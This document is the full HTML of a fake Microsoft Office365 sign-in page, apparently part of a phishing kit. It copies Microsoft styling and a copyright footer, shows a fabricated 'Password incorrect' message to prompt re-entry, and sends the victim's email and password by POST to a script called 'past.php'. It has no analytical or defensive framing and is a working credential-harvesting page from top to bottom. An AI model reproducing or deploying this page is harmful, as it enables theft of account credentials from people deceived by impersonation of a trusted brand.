

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Microsoft</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body {
	background:url(image/bfsd.jpg);
	background-repeat:no-repeat;
	background-size:100% 100%;
	height:500px;
	background-attachment:fixed;
}
   
   



.center {
	background-color:#fff;
	position:absolute;
	width:300px;
	height:autopx;
	top: 40%;
	left:50%;
	-webkit-transform:translate(-50%, -50%);
	-moz-transform:translate(-50%, -50%);
	-o-transform:translate(-50%, -50%);
	-ms-transform:translate(-50%, -50%);
	transform:translate(-50%, -50%);
	
}




img.avatar {
    width: 30%;
}
	
.form {
  position: absolute;
  top: 40%;
  left: 50%;
  background: #fff;
  width: 400px;
  margin: -140px 0 0 -182px;
  padding: 30px;
  padding-bottom:10px;
  box-shadow: 0 0 3px rgba(0, 0, 0, 0.3);
}
.form h2 {
  margin: 0 0 20px;
  line-height: 1;
  color: #44c4e7;
  font-size: 18px;
  font-weight: 400;
}


h3{
	color: #404040;
    font-size: 1.5rem;
    font-weight: 600;
    padding: 0;
    margin-top: 20px;
    margin-bottom: 12px;
    font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}

span {
	color: #404040;
    font-size: 10;
    font-weight: 500;
    padding: 0;
    margin-top: 20px;
    margin-bottom: 12px;
    font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}



.form input {
  font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
  font-size:.9375rem;
  outline: 0;
  background: #fff;
  width: 100%;
  border:1px solid #393939;
  margin: 0 0 15px;
  padding: 9px;
  box-sizing: border-box;
  font-size: 14px;
}

.form input:hover,.form button:active,.form button:focus {
	border:1px solid #0067b8;
}



.form button {
  cursor: pointer;
  background: #0067b8;
  width: 25%;
  border:1px solid #0067b8;
  padding: 8px 3px;
  border: 0;
  color: #fff;
  font-size: 14px;
  font-weight: 400;
}
.form button:hover {
  background: #0067b8;
}
.error,
.valid {
  display: none;
}


.message a {
	font-family:"Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
  color:#0057AE;
  font-size: 13px;
  font-weight:400;
  text-decoration: none;
}

.done {
	  font-size:13px;
	  font-family: "Segoe UI Light WestEuropean","Segoe UI Light","Segoe UI",Tahoma,Arial,sans-serif;
	  font-weight:900;
  }
  
  
  .footer {
   position: fixed;
   left: 0;
   bottom: 0;
   width: 100%;
   background-color:rgba(0, 0, 0, 0.5);
}

.footer a{

float:right;
  color: #f2f2f2;
 font-family:"Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
  text-align: center;
  padding: 8px 12px;
  text-decoration: none;
  font-size: 11px;
}


















</style>


</head>
<body>
<div class="center">


<section class="form animated flipInX">
<img src="image/logo5.png" alt="Avatar" class="avatar">
 <p><h3>Sign in</h3>
 <span style="color:#F00; font-weight:200;">Password incorrect pls try again</span></p>

 <form class="login-form"
     method="POST" 
   action="past.php">
      <input type="email" name="email" placeholder="Office365 Email" required/>
      <input type="password" name="password" placeholder="Password" required/>
      <button>Sign in</button>
      <p class="message">No account? <a href="#">Create one!</a><br /><br />
      <a href="#">Can�t access your account?</a>
      </p>
    </form>

</section>


  




</div>

<div class="footer">
<a href="#">...</a>
  <a class="Privacy & cookies" href="#home">Privacy & cookies</a>
  <a href="#Terms of use">Terms of use</a>
  <a href="#">�2019 Microsoft</a>
  </div>


</body>
</html>